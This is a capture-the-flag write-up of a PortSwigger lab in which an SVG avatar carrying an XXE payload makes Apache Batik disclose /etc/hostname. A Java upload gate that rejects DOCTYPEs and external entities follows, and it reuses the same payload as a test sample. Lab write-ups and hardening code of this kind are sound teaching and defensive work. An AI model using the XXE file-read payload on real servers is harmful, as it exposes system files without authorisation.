PortSwigger Lab: Exploiting XXE via image file upload
Task
This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.
To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the “Submit solution” button to submit the value of the server hostname.
Attempt
The Apache Batik library is used to process SVG images, and it is known to be vulnerable to XXE: SVG is an XML-based format, so whatever XML parser reads the avatar will also see any DOCTYPE and entity declarations in it.
I used this classic payload from PayloadsAllTheThings and saved it as an SVG image file:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>
The payloads that use expect:// don’t work with Apache Batik (expect:// is a PHP stream wrapper, so a Java parser has nothing to resolve it with).
I uploaded this file as an avatar, viewed the processed image, and it revealed the hostname.
Mitigation
Disable external entity resolution.
Disable XInclude.
Strip DOCTYPE and entities before parsing.
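As an added example (not part of the original write-up, and not Batik's own code), the following JAXP configuration applies the three mitigations above to an upload gate that runs before the SVG ever reaches the image library. It uses the standard javax.xml.parsers API; the class name SvgUploadGate and its methods are hypothetical, and the sample inputs are constructed (the hostile one is the lab payload from above). Batik's own document factory is not configured here: the assumption is that anything rejected by this gate is never handed to Batik.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;

import org.w3c.dom.Document;
import org.xml.sax.SAXException;

/** Hypothetical upload gate: validates an SVG with a JAXP parser hardened against XXE
 *  before the file is passed on to the image-processing pipeline. */
public class SvgUploadGate {

    /** Builds a DocumentBuilder with DOCTYPE, external entities and XInclude disabled. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any DOCTYPE outright: without a DTD there is nowhere to declare <!ENTITY ...>.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a deployment ever relaxes the line above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);           // no <xi:include href="file:///..."/>
        f.setExpandEntityReferences(false);  // never expand entity references into the DOM
        return f.newDocumentBuilder();
    }

    /** Returns true if the SVG parses under the hardened configuration and has an <svg> root. */
    static boolean isAcceptableSvg(String svg) {
        try {
            Document doc = hardenedBuilder()
                .parse(new ByteArrayInputStream(svg.getBytes(StandardCharsets.UTF_8)));
            return "svg".equals(doc.getDocumentElement().getTagName());
        } catch (SAXException e) {
            // A DOCTYPE in the upload is reported as a parse error by disallow-doctype-decl.
            return false;
        } catch (Exception e) {
            // Parser configuration or I/O problems: fail closed.
            return false;
        }
    }

    public static void main(String[] args) {
        // Constructed sample: the lab payload from this write-up.
        String hostile = "<?xml version=\"1.0\" standalone=\"yes\"?>\n"
            + "<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]>\n"
            + "<svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" version=\"1.1\">\n"
            + "<text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>";
        // Constructed sample: a harmless avatar.
        String benign = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"128\" height=\"128\">"
            + "<circle cx=\"64\" cy=\"64\" r=\"60\"/></svg>";

        System.out.println("hostile accepted? " + isAcceptableSvg(hostile));
        System.out.println("benign accepted?  " + isAcceptableSvg(benign));
    }
}
```

The gate rejects rather than strips: with disallow-doctype-decl set, the lab payload fails at the DOCTYPE line and the parser never reaches the entity reference, while a plain SVG with no DTD passes. Rejecting is simpler and safer than stripping, because there is no risk of a partially stripped DTD still reaching the downstream parser.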